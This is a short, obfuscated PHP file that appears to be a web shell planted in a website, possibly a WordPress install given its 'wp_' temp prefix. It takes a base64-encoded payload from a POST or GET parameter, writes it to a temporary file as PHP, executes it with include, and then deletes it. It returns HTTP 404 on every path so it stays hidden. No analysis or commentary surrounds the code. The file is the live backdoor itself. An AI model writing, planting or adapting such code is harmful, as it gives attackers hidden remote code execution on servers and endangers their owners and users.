<?php
try{
$h0dcbc[]='file_'.'put_contents';
$h0dcbc[]='te'.'mpnam';
$h0dcbc[]='array_'.'key_exists';
$h0dcbc[]='base64'.'_decode';
$h0dcbc[]='un'.'link';
$h0dcbc[]='sys_get_'.'temp_dir';
$h351e1='573429'.'fb';
if($h0dcbc[2]($h351e1,$_POST)){
$xbdb03=$h0dcbc[3]($_POST[$h351e1]);
}elseif($h0dcbc[2]($h351e1,$_GET)){
$xbdb03=$h0dcbc[3]($_GET[$h351e1]);
}else{$xbdb03=null;}
if($xbdb03){
$v77f4a=$h0dcbc[1]($h0dcbc[5](),'w'.'p_');
if($v77f4a){
$h0dcbc[0]($v77f4a,'<'.'?ph'.'p '.$xbdb03);
http_response_code(404);
@include_once($v77f4a);
@$h0dcbc[4]($v77f4a);
}}
http_response_code(404);
}catch(Throwable $e){http_response_code(404);}catch(Exception $e){http_response_code(404);}
